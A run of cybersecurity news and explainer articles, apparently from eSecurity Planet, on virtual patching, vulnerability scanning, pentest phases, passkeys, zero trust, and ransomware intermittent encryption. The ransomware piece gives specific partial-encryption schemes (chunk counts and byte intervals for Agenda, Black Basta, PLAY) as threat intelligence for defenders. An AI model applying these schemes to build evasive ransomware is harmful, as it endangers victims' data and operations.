Cyber criminals are constantly searching for vulnerabilities to execute attacks. Zero-day attacks are becoming increasingly common and dangerous. Furthermore, ethical hackers working in bug bounty programs, such as HackerOne, also reveal vulnerabilities every day. All of these issues are exploited by attackers.

The consequences of not patching business-critical security flaws are severe. They range from massive sensitive data leaks, data theft, ransomware, fines, reputation and financial losses, to shutdown of operations due to compromised systems. Many top vendors offer virtual patching services. These can be effective for businesses that do not have the in-house resources to develop their virtual patches.

Developers and technology companies will often release temporary patches or mitigation steps to plug vulnerabilities until official patches can be released, so security teams have some help in their virtual patching programs.

Also read:

• Vulnerability Management as a Service: Top VMaaS Providers
• Best Patch Management Service Providers
• Best Patch Management Software & Tools

Pros and Cons of Virtual Patching

Undeniably, virtual patching is critical due to the rapid evolution of the threat landscape. However, virtual patching is designed to be a temporary fix. It does not patch the vulnerability itself but prevents traffic from accessing and exploiting it.

One of the most significant benefits of virtual patching is that it buys security teams and developers the necessary time it takes to create real patches. Virtual patches also accelerate testing and deployment by gathering information on the threat. Fixing and coding software or applications can be time-consuming endeavors, but creating a shield that prevents traffic flow by allow-or-block rules is much easier and can be done rapidly.

On the other hand, while virtual patching gives organizations time to prevent the risk of cyberattacks, they can be tricked through evasion and deception techniques. Virtual patching also creates a long-term risk for organizations when they delay or choose not to move forward with more permanent security patches and solutions.

Regarding privacy and data compliance laws, virtual patching can help organizations better meet requirements, such as GDPR and PCI DSS.

Older legacy systems that have reached their end for support and security updates can also benefit from virtual patching. Vulnerability best practices and a complete understanding of their benefits and limitations can help companies keep up to date with security in the new era of digital transformation, acceleration, and modernization.

Bottom Line: Virtual Patching

Hackers can exploit new vulnerabilities within days, while it can take weeks or months for vendors to develop and release an official patch. Virtual patching, then, is a creative way to fill that gap until an official fix is available — or in the case of a legacy system, in case one never becomes available. In a time of increasingly dangerous cyberattacks, that’s a skill every cybersecurity team needs.

Read next: Patch Management Best Practices & Steps

The post What is Virtual Patching and How Does It Work? appeared first on eSecurity Planet.

As enterprise IT environments have grown more complex, the ways hackers can attack them have grown too. The edge, cloud computing, Internet of Things (IoT) devices, and more have led to a much bigger attack surface and have required new vulnerability scanning approaches and tools.

Cybersecurity vendors and developers have responded to these growing challenges by evolving vulnerability scanning tools and integrating these solutions as part of an integral, holistic vulnerability management framework.

Intruder — this article’s sponsor — is one such tool, an easy-to-use enterprise-grade vulnerability scanner that performs over 10,000 security checks, including perimeter scanning, internal scanning, cloud resource scanning, and web application vulnerability scanning.

Try Intruder free for 14 days!

See the Best Vulnerability Scanning Tools

How Does Vulnerability Scanning Work?

Vulnerability scanning tools, or vulnerability scanners, do much of the work by scanning IT systems and networks to identify vulnerabilities in devices and software and flag those that need attention.

But that’s just one step in the process. There are six phases in the vulnerability assessment and management process, and they all work together to ensure optimal security.

Phase one: Asset inventory

The first phase of vulnerability management is to create a comprehensive asset inventory across the entire organization. Because a vulnerability scan will only reveal a particular moment of your operations frozen in time, security programs and vulnerability scanning tools must be scheduled to run automated, periodic scans.

Also read: Top IT Asset Management (ITAM) Tools for Security

Phase two: Setting priorities

The next step is critical for vulnerability scanning tools to be effective; assets must be prioritized based on business-critical degrees. This means that, by now, you must know what to scan, when to scan it, and what are the most important assets in the scan. This phase streamlines security decision-making and helps teams respond with precision without wasting time and resources.

Phase three: Assessment

The third phase of the vulnerability management program is assessment. This is where security tools come into play. Once vulnerability scanning solutions are configured with the “where, when, and what’s a priority,” the scans are executed. This allows you to determine which risks to eliminate first based on various factors, including their criticality and vulnerability threat levels, as well as classification.

Vulnerability scans use the asset or data inventory and scan the attack surface in search of flaws, coding bugs and errors, anomalies, and default or misconfigured configurations. Then, they identify potential paths attackers can exploit.

Phase four: Reporting

The vulnerability scanning and assessment cycle is completed with the reporting phases, in which vulnerability scanning and other security tools issue reports. Findings are used to get a clear idea of the risks, factors, and threats levels.

Phase Five: Remediation

During this phase the reports are used to patch flaws. Some vulnerabilities, like outdated software or outdated operating systems, can be easily solved with updates. Other fixes require advanced technical knowledge.

For example, cross-site scripting attacks, SQL injection vulnerabilities, and unencrypted channels require an experienced professional. Professional vulnerability scanning vendors usually offer a final report with all weaknesses discovered and pair each flaw with a recommended action.

Phase six: Verification and monitoring

The vulnerability scanning process ends with a final phase and then a restart of the entire process. The final phase sets new schedules for vulnerability scanning to verify flaws corrected and monitors the networks and systems.

Also read:

• Best Patch Management Software & Tools
• Patch Management Best Practices & Steps

Vulnerability Scanning vs. Penetration Testing

The main difference between vulnerability scanning and penetration testing is that the first is fully automated, while the second includes the manual work of a penetration tester that will exhaustively try to exploit weaknesses in systems. Penetration testers simulate attacks; they try to get in the mindset of a cyber criminal and use their techniques to find weaknesses and report the consequences that such a breach could have.

While intrusive vulnerability scanning can also exploit vulnerabilities, it does so automatically. The real purpose of a vulnerability scan is to give security teams a big picture look at critical assets, system and network flaws and security.

Despite their differences, both vulnerability scans and penetration tests are part of the wider vulnerability management framework or process. They are two different tools, each essential in their own way and critical for chief information security officers (CISOs) to keep their infrastructure safe.

While pentesting is part of a broader vulnerability management program, the two have one other essential difference: Vulnerability management is looking at IT and business systems as a whole, while pentesters are typically trying to breach an organization from outside the network (see Penetration Testing vs. Vulnerability Testing: An Important Difference).

Why Is Vulnerability Scanning Necessary?

Just as security teams run vulnerability scanning tools, cyber criminals do the same. They are constantly searching for flaws and weak entry points into a system. Additionally, a vulnerability scan reveals only your network and systems at a particular time. Therefore, scheduled and automated vulnerability scans are necessary to understand the security posture of the system and its flaws throughout different periods.

Vulnerability scanning also allows companies to take a proactive offensive approach to defensive security. They seek to stay one step ahead of cyberattacks and to maintain strong systems. Scans will enable you to close gaps before they become incidents.

Given the high cost of cyberattacks, vulnerability scans act as a cost-effective way to stay proactive in protecting your network. The consequences of breaches can be devastating, from data exfiltration to leaks, ransomware extortion, legal suits, fines, loss of reputation, and even shutdown of operations. Along with other tools, vulnerability scans are essential to protect against these consequences.

Types of Vulnerability Scanning

Security teams can configure vulnerability scans to execute different tests. It’s important to note that while top vendors offer modern vulnerability scanning tools that can be tuned, other solutions are niche or outdated. It’s essential to understand each type of scan and what your organization needs to make sure you get the right solution.

Bug bounty programs

Bug bounty programs use a community-driven approach to vulnerability scanning. These programs incentivize freelance hackers to find bugs on public-facing systems by offering rewards. Bug bounty programs have become increasingly common and are used by top technology companies. In these programs, organizations can have their system continuously tested throughout their life cycle.

Internal scans

These scans are done from inside the network using techniques such as privilege escalation. Internal scans are especially useful for mapping workforce permissions and finding vulnerabilities to an inside attack.

Also read: Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

External scans

These will scan all assets online, including employee login pages, remote access ports, or company websites. These scans help organizations understand their online weaknesses and how they can be used to gain access to their network.

App-based scans

These scans are used when companies need to understand the flaws of specific endpoints — for example, a web-facing server, IoT devices or wireless networks. Assets scanned are usually linked to the company’s critical operations assets to prevent attacks that can cause downtime.

Continuous scans

These are automated scheduled scans that usually run every quarter. Industry experts recommend that vulnerability scans be run at least once every three months. These scans can be configured as comprehensive or limited, external or internal, or other types.

Breach and attack simulation (BAS) tools offer a more automated approach to vulnerability scanning and penetration testing.

Intrusive and non-intrusive scans

Non-intrusive scans do not engage in vulnerability exploitation, and the report is based on the probability of a breach happening. On the other hand, intrusive scans will attempt to exploit vulnerabilities if discovered. An intrusive scan will make the stakes clearer but could also disrupt operations.

Limited or comprehensive scans

Vulnerability scans can be limited to a certain set of devices, systems, and networks or be comprehensive and include all components.

Authenticated and unauthenticated scans

Vulnerability tools can run unauthenticated scans where only the open services available on the network are evaluated. On the other hand, authenticated scans access resources and assets that can only be scanned with privileged access and thus test higher-value targets.

Complementary Security Measures

Vulnerability scanning is augmented by different tools within the vulnerability management program. These tools include asset discovery and inventory management solutions, which help IT teams keep track of all devices, software, servers, and more across the company’s digital environment.

Other tools like patch management solutions ensure that systems and apps are up to date with the latest security patches. These automatically check for updates and notify teams when an update is required or new updates become available. They can run on entire networks.

Misconfiguration is one of the most common vulnerabilities leveraged by hackers. Security configuration management (SCM) software ensures devices and their security settings are properly configured. Some SCM tools can scan devices and networks for vulnerabilities, track remediation actions, and generate reports on security policy compliance.

While vulnerability scans only provide a view of the system frozen in time, security information and event management (SIEM) software can provide real-time insight into security information and events by analyzing log data from a wide variety of sources. They are designed to let security teams know what’s happening across their IT infrastructure, including network traffic, devices trying to connect to internal systems, user activity, and more.

Penetration testing is another tool used in vulnerability management. By simulating attacks in realistic ways, testers can identify weak spots in systems that real-world attackers could exploit. Finally, threat protection software allows organizations to track, monitor, analyze, and prioritize potential threats by collecting data from various sources.

Vulnerability Scanning Software and Tools

There are many vendors offering different solutions for vulnerability scanning. However, most require IT professionals to configure them and make sure the scans are done correctly. Additionally, security professionals also need to interpret the reports these tools generate.

To meet the demands of digital transformation, many traditional vulnerability scanning tools have been updated to prioritize flaws based on critical business levels, to scan new surfaces like IoT devices, and to detect human-element security weaknesses to phishing and other employee-directed attacks.

Here are some of the top vulnerability scanners; see our lists of open source and commercial vulnerability scanners for more options.

Top vulnerability scanning tools

• OpenVAS: Runs multiple scanning techniques, including internal and external scans. The platform has a dedicated community of testers and uses its programming language for multiplatform flexibility.
• Tenable: Offers comprehensive vulnerability management solutions specializing in continuous monitoring, not just on single vulnerability scans. It also provides compliance reports, risk assessments, and threat monitoring.
• Network Mapper: Also known as Nmap, this open-source vulnerability scanner can identify vulnerabilities in protocol, view running services, and port scan different addresses.
• Rapid7: Provides different tools for vulnerability management, including SIEM and vulnerability scans. The platform offers managed security services, product consultations, and certification programs.

Bottom Line: Vulnerability Scanning

Vulnerability scanning is a critical cybersecurity practice that every organization needs to be doing to limit potential entry points for hackers.

Vulnerability scanning tools have come a long way, adapting to the challenges of an increasingly dangerous security landscape. Today, vulnerability scans are configurable and can set priorities and give new insights relevant to the expanded digital attack surface. They’re an essential cornerstone of a vulnerability management program.

Read next: Vulnerability Management as a Service (VMaaS): Ultimate Guide

This updates an April 5, 2019 article by Paul Rubens

The post What is Vulnerability Scanning & How Does It Work? appeared first on eSecurity Planet.

But before hiring penetration testers or starting a pentesting program, any organization should be aware of the phases and steps involved in the process. These tests are critical for obtaining an integrated view of a system, understanding how possible security breaches can occur, getting into the mindset of cyber criminals, and patching flaws.

Penetration testing can use different techniques, tools, and methods. For example, they might simulate an external attack, as in a black box pen test; an internal attack, or a white box pen test; or an external attack that has internal credentials, called a gray box pen test, which cyber criminals usually obtain through phishing. The different variables require all sides to be fully informed for a practical penetration test to be successful.

See the Best Penetration Testing Tools

What are the 7 Penetration Testing Phases?

Some organizations list five penetration phases while others list six or seven. Additionally, organizations may have different names for each phase, despite the processes of the phase being identical.

The discrepancy in the number of test phases is due to two stages that occur before the test and once it is concluded, which some organizations leave out. While they are not technical parts of the test, they have proven vital for security. This report includes all seven stages to give full visibility of the processes required for a penetration test.

The seven phases of penetration testing are:

1. Pre-engagement
2. Reconnaissance or Open Source Intelligence (OSINT) Gathering
3. Scanning or Discovery
4. Vulnerability Assessment: Gaining Access
5. Exploitation: Maintaining access
6. Post-Exploitation, Reporting, and Risk Analysis
7. Remediation

1. Pre-engagement

Pre-engagement is a phase often left out. However, it is fundamental for penetration testers and organizations to be on the same page. Built In explains that it is a bad idea to hire a penetration tester and let them run wild on your network. The pre-engagement phase is where the scope, logistics, rules of engagement, and timeline of the entire pen test are set with clear goals, targets, and objectives.

If there is no understanding of what needs to be tested and what type of tests are required, the results of a penetration test will be incomplete or even irrelevant. Pre-engagement is where the test is planned; therefore, no organization nor pentester should start without going through this first step.

Additionally, to thoroughly test the system, actions are required from pentesters that would be illegal without explicit consent or authorization. This is why organizations should also set clear rules of engagement in contracts with testers. Contracts, signed during pre-engagement, should also list critical assets, the main goals of the test, and other precautions.

2. Reconnaissance or open-source intelligence (OSINT) gathering

EC-Council Cybersecurity Exchange explains that reconnaissance is where testers gather as much information about the system as possible. But it’s not just about collecting random data. The goal is to gather data relevant to the tests that will be executed. This is why the first stage is critical. Planning the penetration test allows the tester to be more precise when determining what type of data they gather to plan an effective attack strategy.

Reconnaissance can be active, when the tester engages directly with the target system, or passive, where publicly available information is obtained. Usually, comprehensive testers use both methods.

Active data gathering might include networks, operating systems and applications, user accounts, domain names, and mail servers. At the same time, passive techniques or open-source intelligence may use social media, websites, tax information, and other public information.

Some tools used to gather network information include Censys or Shodan. Reconnaissance tools scan public-facing IP addresses and index their response headers, giving pentesters a complete idea of the external networks without having to run scans actively.

The OSINT Framework, used in penetration testing data gathering phases, reveals how vast  resources of open-source information are available for this stage. Cipher explains that pentesters use an exhaustive checklist to find open entry points and vulnerabilities within the organization.

3. Scanning or discovery

In this phase, testers look for entry points. Ideally, they seek to identify as many open ports as possible. Several tools are used in this stage to identify the open ports and check network traffic.

The discovery phase consists of scanning and asset analysis using tools such as Nmap, which is a network scanner used to discover hosts and services on a computer network by sending packets and analyzing the responses. In this phase, the tester can gain information on available assets and information, such as operating systems, open ports, and running services.

If the tester runs a white box test, the organization may have already provided the list of IPs to target, assets, and other network information. However, if they are running gray or black box tests, they simulate an actual attack and work without this information. Therefore, this phase is critical when running gray and black box tests.

See the Best Vulnerability Scanning Tools

4. Vulnerability assessment: Gaining access

Using the data gathered during the previous phases, the tester will begin building a threat model and assess vulnerabilities. Targets are identified, and the tester maps the attack vectors.

Pentesters will map and identify areas and high-value assets, such as:

• Employee data
• Customer data
• Partners and supply chain data
• Technical data
• Internal and external threats from management
• Vendors
• Ports
• Networks
• Apps
• Protocols

Penetration testers can use resources like the National Vulnerability Database (NVD), a repository of vulnerability management data that analyzes software vulnerabilities published in the Common Vulnerabilities and Exposures (CVE) database, EC-Council explains. While manual vulnerability scanning can be done, testers usually use tools like Tenable, Rapid7, Qualys, and Nmap.

Some security organizations refer to this stage as “gaining access.” Imperva explains that testers use web application attacks, such as cross-site scripting, SQL injection, and backdoors, to find vulnerabilities and exploit them by escalating privileges, stealing data, intercepting traffic, and other techniques.

5. Exploitation: Maintaining access

In this stage, testers prove whether the vulnerabilities identified can be exploited. Also known as maintaining access, exploitation is one of the most critical stages because the tester is attempting to breach and access the target system.

In this penetration testing phase, the tester attempts to access the target system and exploit the identified vulnerabilities, typically using a tool like Metasploit, which simulates real-world attacks. Penetration testers are responsible for an organization’s assets, and in this stage, they must ensure the system isn’t compromised or damaged due to their simulations.

Real cyberattacks can range from a couple of minutes to hours, so the vulnerabilities identified in the previous phases must be persistent for them to be exploitable by bad actors. Generally, testers will go after the root or administrator privileges of a device or system.

Metasploit is used due to its streamlined process capabilities for finding and executing publicly available exploits for vulnerabilities. Besides ensuring that vulnerabilities are stable, this phase also measures the consequences of the breach. For example, if the tester could encrypt or exfiltrate data or simulate zero-day attacks or ransomware hacks and to what extent.

Also read: Getting Started With the Metasploit Framework: A Pentesting Tutorial

What are the Next Steps After a Penetration Test?

The final stages of a penetration test are reporting and remediation. These phases reveal the next steps for an organization and pentesters as they wrap up the discovery of vulnerabilities and the consequences that arise from their exploitation of them. In these stages, the foundations to strengthen security posture are put forward and later implemented.

6. Post-exploitation, reporting, and risk analysis

While most organizations list this step as strictly a reporting stage, other post-exploitation components like clean-up activities need to be included in this stage of the penetration test.

Cipher explains that once the testing is complete and the reports and recommendations are presented, the tester needs to clean up the environment. This implies leaving the system exactly as they found it, reconfiguring access used to breach the IT environment, and restoring other modifications they might have made. Clean-up activities also pave the way to remediation and the final phase of penetration testing.

Typical cleanup activities:

• Removing any executables, scripts, and temporary files from compromised systems
• Reconfiguring settings back to the original parameters before the pentest
• Eliminating any rootkits installed in the environment
• Removing any user accounts created to connect to the compromised system

The report is considered the most critical document generated by the test. It is the final presentation to the organization which hired the pentester. With the report, organizations can take action, fix vulnerabilities, and strengthen their systems and staff if needed.

Reports need to be clear and transparent. Testers must document all phases, the assets targeted, the type of test and technique, and the vulnerabilities and ramifications discovered. Additionally, guides to fix or patch the vulnerabilities can be included.

Pentesting reports include:

• Specific vulnerabilities that were exploited
• Sensitive data that was accessed
• The amount of time the pen tester was able to remain in the system undetected

It is normal practice for an organization to request sanitized example reports from pentesters before they hire their services. This allows them to view the standards and details used by the vendor. Good penetration test reports have findings well-organized and prioritized by risk level.

See also: Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

7. Remediation

Remediation is the final phase of a penetration test, and it falls within the organization’s responsibilities. Using the report and findings and the information they have from interacting with the pentester, especially if a white box pentest was done, organizations can begin to make changes to their systems to fix the vulnerabilities that have been revealed.

Remediation can be very challenging for organizations that do not have the resources. Therefore, reports that include guides for remediation are the most valued. After remediation, the phases will often restart to test updates or other systems or run different types of penetration testing.

Understanding the phases of penetration testing is vital for the industry to continue to build resilience in the face of increased cyberattacks. Cyber criminals use techniques to bypass automated and traditional cybersecurity solutions. Simulating real attacks with penetration tests is proving to be one of the most effective tools the security industry has today.

Read next: Penetration Testing vs. Vulnerability Testing: An Important Difference

The post Penetration Testing Phases & Steps Explained appeared first on eSecurity Planet.

Google, Paypal, and Lenovo were among the original FIDO founding members. By 2015, Microsoft joined, and in 2020, Apple followed. The road to a passwordless world has been slow, but seems to have accelerated in the past year, helped in part by Microsoft’s move to passwordless sign-on.

Apple has also promised that passwords will be a thing of the past, and passkeys will become available for iOS 16. Microsoft is already providing passwordless features to Azure Active Directory, and for Google, multi-factor authentication (MFA) has become mandatory.

While big tech phases in new authentication solutions, Dashlane — a password manager used by more than 20,000 companies and more than 15 million users — made a full switch.

Dashlane last month integrated passkeys into its cross-platform password manager. Users can now set up passkeys in Dashlane to log into sites and apps, replacing traditional passwords.

Dashlane took a different passkey approach as the one Microsoft, Google, and Apple have embarked on, which requires users to play with their phone to log in by scanning QRs or by using face or finger ID or pin codes. Dashlane claims its process is simpler because it has apps for most platforms and extensions for most browsers, requiring less action from users to authenticate their access.

But beyond these cases, how advanced is the implementation of the technology that wants to end passwords once and for all?

See the Top Password Managers

The Natural Log-in Evolution

eSecurity Planet spoke with Aarti Dhapte, senior research analyst at Market Research Future, to understand how big the passkey market is, what technical challenges it faces, and what the security, legal, and ethical implications are that affect the sector.

The senior research analyst says the industry sees passkeys as the solution to the many password problems and is heavily investing in them. The passkey market size in 2021 was $158.7 million and is expected to reach $3.4 billion by 2030 — a stunning 2,000% in less than a decade.

Dhapte explains that passkeys are a natural next step. Driven by significant tech investments — responsible for pushing the new authentication technology — the industry and users have been getting accustomed to the latest tech, first with two-factor authentication (2FA), followed by MFA and now with passkeys.

However, the challenges to making this global shift are significant. Hardware and software, devices, and websites still need to level up.

For example, the widespread use of biometrics is only possible thanks to new smartphone technology, which has the capacity to run the required neural network needed to accurately power the algorithms and sensors that read faces and fingerprints. In similar ways, companies like Apple and Google are taking further steps and changing their phone software and online browsers to support passkey technology now.

Market Research Future advises tech companies that want to join the movement to go through the natural steps of evolution and first deploy 2FA as a starting point.

“After that, progress to MFA,” said Dhapte. “It allows users to become accustomed to the passwordless experience before making the complete change.”

Dhapte said that MFA educates workers on biometrics, smart cards, and other passwordless technologies, lowering friction during future full-passwordless onboarding procedures.

See the Top Identity & Access Management tools

The Challenges of New Authentication Technologies

While the use of passwords is expected to decline over time, industry experts and vendors say that adopting new technologies will be tedious and time-consuming.

“Opinions on the future of passwords remain divided, but hope for a password-free industry continues,” Dhapte says.

passkeys are a form of a password; to some extent, users have been using them for some time

One of the main challenges is that passwords will continue to exist in older systems and legacy tech. Another challenge is users’ misconception about passkeys, often expecting completely frictionless access. However, passkeys are a form of a password; to some extent, users have been using them for some time.

“They are nothing that most people haven’t seen or used before. Many banks and financial applications, including Mint, now employ Face ID or Touch ID,” said Dhapte. “From where consumers stand, that is precisely how passkeys will work: Users will verify with their face or fingerprint.”

The technology built to make users’ lives easier has a set of problems that make its “behind-the-scenes” technical processes very complex. Compatibility is one of these problems. Passkeys, unlike passwords, are not saved on a site but on a device. But if users generate a passkey with a device, they should also be able to access the site or app, even when using another device.

Google, like Apple, assures it will guarantee compatibility. Apple solves this issue by syncing passkeys with the iCloud Keychain, making them available across Apple devices, but what if the users want to log in from a Windows-based computer? Linking access to all apps, services, and sites to one device or cloud, without a doubt, presents security and convenience issues.

Additionally, for passkeys to become a mainstream technology, most companies and organizations must adopt them, and users must buy new devices that support the tech. But without the resources and technological tools, many are left out of the movement.

“Websites will retain existing passwords. They have to since it will be decades before every user has the appropriate hardware and software,” Dhapte said. According to Dhapte, even if some consumers can afford a new device, websites will not remove all password authentication because they risk losing other users.

The account recovery element of passkey is another double-edged sword. While a consumer application will almost certainly be pleased to outsource account recovery to Apple, Google, or Microsoft, many administrators may not be.

Security, Legal and Ethical Implications

Storing all passkeys on a single device can become a security nightmare if a phone is lost, stolen, or physically accessed. Even changing phones is not a streamlined process when using 2FA and MFA, especially considering the average number of services and sites users access every week.

On the other hand, while passkeys may do much to stop email phishing, as biometrics won’t be an easy target, cyber criminals can turn to other malware to remotely hack and unlock a phone. These types of attacks are expected to increase. Biometrics is presented as the solution to this security issue. But some are not fully convinced.

A few years ago, a security hacker — Jan Krissler, alias Starbug — demonstrated this vulnerability by utilizing a high-resolution photo of German Defense Minister Ursula von der Leyen’s thumb and “reconstructing it with commercial software to demonstrate the relative simplicity of fingerprint identity theft,” Dhapte said.

Additionally, In 2020, Cisco Talos discovered that some fingerprint scanning equipment might be exploited using 3D printing.

Biometrics controls and controversies

Live checks, which are still in the process of being perfected, have since been deployed to make it more challenging for cyber criminals to breach biometrics. And how biometric data is stored, managed, and deleted has also progressed.

Today, the most advanced biometrics systems never store video, fingerprints, or other raw data. They convert the data into templates that, even if leaked or breached, cannot be used to hack an account.

The use of biometrics also comes with ethical and legal costs. The risk of misuse is significant. Identity, citizenship, and surveillance are all societal concerns.

“Biometric identity raises broader concerns about citizenship, monitoring, and human rights,”  Dhapte said.

These dangers are exacerbated by a lack of standards, regulatory safeguards, ecosystem collaboration, and broad public knowledge.

“Varied legal coverage (for customers vs. workers, for example) by industry, variable recourse, and precedents all contribute to a perplexing compliance effort with various legal difficulties,” Dhapte added.

Companies that do not protect biometric data can face legal consequences, reputation damages, fines, and other penalties. The European Union General Data Protection Regulation (GDPR) considers biometric data as sensitive data that requires the informed consent of the involved person. In the U.S., several federal and state laws regulate data security and biometrics.

In 2008, Illinois became the first U.S. state to enact biometric legislation with the Biometric Information Privacy Act (BIPA). More than 25 states followed, passing biometric laws. These include Texas, Washington, California, New York, Louisiana, Oregon, and Arkansas. These state laws regulate how companies collect, retain, disclose, and destroy biometric information and other purposes.

Biometric lawsuits have already reached the U.S. Supreme Court. In Cothron v. White Castle System, Inc., employees filed a class-action lawsuit against the company for scanning their fingerprints without asking for prior consent. If the Supreme Court rules against the company, the penalties are so severe that it could lead to the company’s bankruptcy. As biometric technology continues to be adopted, a rise in related lawsuits can be expected.

In today’s technological environment, cryptography is frequently employed as a method of information security. It has been used in everyday home objects, e-commerce, email, and other internet-based services. The rising dependence on cryptographic technologies has highlighted many worldwide ethical and security concerns.

“Cryptography’s problems focus on intellectual property and copyright issues, hence a matter of information access. Indeed, encryption is the foundation for copyright and access permission in digital contexts,” Dhapte added.

Awaiting the future

Passwords will continue to evolve, and passkeys are poised to take over. Whether the ride will be gradual or abrupt is yet to be fully seen. The passwordless future is paved with serious challenges, and an honest debate about its realities and processes should unfold before its global implementation.

“We will have to wait for all the companies involved to provide their passkey implementations before we can comprehend the full effect and possible mitigations,” Dhapte said.

Read next: New Quantum-safe Cryptography Standards Arrive None Too Soon

The post The Challenges Facing the Passwordless Future appeared first on eSecurity Planet.

Intermittent encryption allows the ransomware encryption malware to encrypt files partially or only encrypt parts of the files. The features are designed to increase attacks’ speed, reducing the chances of being detected and having the threat shut down.

Sentinel Labs reported the new trend earlier this month, as ransomware groups have adopted the latest technology. The new tech was advertised on a forum to attract buyers fueling the Ransomware-as-a-service (RaaS) trade. Not only can intermittent encryption accelerate the time-intensive process of ransomware encryption, but it can also prevent detection.

Ransomware detection systems use statistical analysis, with some tools measuring the intensity of I/O operations or benchmarking versions of a file. Due to the aggressive nature of encryption, these tools pick up the activity when ransomware actors begin encrypting files. However, intermittent encryption, because it does not encrypt the entire file, is a “lighter” process, affecting less file I/O intensity. This makes intermittent encryption a stealth operation that can evade normal detection tools.

The intermittent encryption trend began with LockFile in mid-2021, and Black Basta, ALPHV (BlackCat), PLAY, Agenda, and Qyick have embraced the technique. Different ransomware groups and ransomware strains offer different types of intermittent encryption. Some are written on Go and can be customized. Others are automated. And some encrypt files partially, while others encrypt files skipping bytes.

See our complete guide to Preventing, stopping and recovering from ransomware attacks

Qyick Ransomware: ‘What the cool kids are using’

The time it takes to encrypt a system and files depends on several factors, the power of the encrypting tools, the size of the file or files, and the system where the encryption runs.

In March 2022, Splunk tested ten different ransomware families and ten samples for each family and executed 400 encryption tests to time the results. During the tests, the strains had to encrypt a total of 53GB and 98,561 files. Different host system hardware and OS configurations were deployed to make the simulation as real as possible.

LockBit came on top with a total encryption time of 5 minutes and 50 seconds, Babuk came in second with 6 minutes and 34 seconds, and Avaddon, Ryuk, and REvil all completed the test in under 25 minutes. On the other hand, BlackMatter, DarkSide, and Conti did it in under one hour. And other strains like Maze or Mespinoza (PYSA) completed the encryption in almost 2 hours.

Why is the time of attack important? If organizations have only a couple of minutes to respond to a ransomware encryption attack, they might choose to focus their cybersecurity efforts on prevention and early ransomware lifecycle counter-measures instead of detection and mitigation. The new intermittent encryption tools suggest this hypothesis should be taken seriously. 

In August, Sentinel Labs observed a new commercial for ransomware called Qyick in a popular forum posted by a user named lucrostm (image below). Lucrostm promised ransomware intermittent encryption malware that had an unmatched speed. Selling for the price of 0.2 Bitcoins to about 1.5 Bitcoins — depending on the customization required by the buyer — Qyick intermittent encryption and the ransomware’s implementation in Go broke into the ransomware threat scene.

“Notably, Qyick features intermittent encryption, which is what the cool kids are using as you read this,” the RaaS post said. “Combined with the fact that it is written in Go, the speed is unmatched.”

The post assures buyers that each build is unique and that the code provides synchronized execution, allowing the ransomware attack to travel through the whole network, preventing it from being limited by the SOC turning off non-infected services while addressing obfuscation and support for multiple addresses.

While Qyick does not offer automatic data exfiltration, leaving that for the attacker to execute before encryption, the user promised that the feature was in development along with anti-forensic capacities and others.

Also read: Exfiltration Can Be Stopped With Data-in-Use Encryption, Company Says

Agenda and BlackCat Ransomware Encryption

Another strain using intermittent encryption is the Agenda ransomware. Written in Go and used to target healthcare and education organizations in Africa and Asia mainly, this strain offers customizable easy-to-code options that modify how the encryption acts. The filename extension and services to terminate can also be customized.

The three possible partial encryption modes of Agenda are:

• skip-step [skip: N, step: Y] – Encrypt every Y MB of the file, skipping N MB.
• fast [f: N] – Encrypt the first N MB of the file.
• percent [n: N; p:P] – Encrypt every N MB of the file, skipping P MB, where P equals P% of the total file size.

On the other hand, BlackCat (or ALPHV) ransomware, rising in late 2021 as the first ransomware written in the Rust programming language, also executes most of its encryption as intermittent encryption.

BlackCat was reversed-engineered by Sentinel Labs researcher Aleksandar Milenkoski.

Milenkoski outlines the different encryption modes of BlackCat as:

Analysis shows that Blackcat noticeably reduced the time of encryption, with results revealing a reduction of wall clock processing time starting at 8.65 seconds for 5 GB file size and a maximum reduction of 1.95 minutes for 50 GB file size. This includes the time it takes to read, encrypt and write each file’s content.

The BlackCat ALPHV threat group is known for being an early adopter of extortion schemes, threatening their victims with DDoS attacks, and leaking exfiltrated data online.

Black Basta and PLAY Ransomware: Automated Chunks

Back Basta and PLAY offer intermittent encryption, but it cannot be configured by the user. 

Back Basta, the RaaS program that emerged in 2022 written in the C++ programming language, bases the intermittence of its encryption on the size of the file. For files that are under 704 bytes, it encrypts the entire file. When files are less than 4 kilobytes, it encrypts every 64 bytes, starting from the beginning of the file and skipping 192 bytes. Finally, for files larger than 4 KB, it does the same but skips 128 bytes creating encryption intervals.

PLAY ransomware, another 2022 player, also varies its encryption on file size, but instead, it just breaks the file into 2, 3, or 5 chunks, depending on the file size, and then encrypts every other chunk.

Sentinel Lab analysis shows that PLAY will create:

• 2 chunks if the file size is less than or equal to 0x3fffffff bytes;
• 3 chunks if the file size is less than or equal to 0x27fffffff bytes;
• 5 chunks if the file size is greater than 0x280000000 bytes.

Whether customized features for encryption or automatic intermittent encryption, if combined with automated data exfiltration tools, ransomware attacks can significantly cut the times of attack lifecycles.

Security experts warn that given the benefits these new encryption technologies provide, cybercriminals will embrace them and intensify their use.

Faced with this new trend, organizations are forced to switch to early prevention and focus on the early stages of ransomware attacks, as detecting and shutting down attacks once they are in full play promises to be very challenging.

As always, well protected data backups are your best hope for a quick recovery – see the Best Backup Solutions for Ransomware Protection.

The post Ransomware Groups Turn to Intermittent Encryption to Speed Attack Times appeared first on eSecurity Planet.

Additionally, attacks are poised to become even more damaging as companies expand their digital footprint and the attack surface grows. This is one reason organizations across industries and geographies are turning to zero-trust architectures to fortify their security posture.

Zero trust implies that every access and connection made to a point of the network is reevaluated and re-authenticated to ensure the user and connection are authorized, with no more access than the user’s role requires.

But how effective is zero trust? That’s an especially important question given the recent emphasis on the technology – including from the White House.

To answer that question, Illumio, a zero trust segmentation (ZTS) vendor, engaged Bishop Fox, a leader in offensive security, to measure how effective zero trust is in detecting and containing ransomware attacks. The company put its zero trust solutions to the test by simulating attacks based on real threat actors’ tactics, techniques, and procedures. The results were announced today at the Black Hat USA 2022 cybersecurity conference.

See the Best Zero Trust Security Solutions

Zero Trust Security Testing

Bishop Fox’s report found that Illumio’s zero trust segmentation technology “significantly improves an organization’s ability to detect, contain, and proactively limit the available attack surface.” ZTS can also be applied to effectively isolate compromised hosts during an active attack, the report said.

Bishop Fox ran four ransomware scenario attacks, a control test with no Illumio ZTS deployed; detection and response; pre-configured static protection; and full application ring-fencing with ZTS. They found that the stricter ZTS is, the faster security teams can detect and stop an ongoing attack.

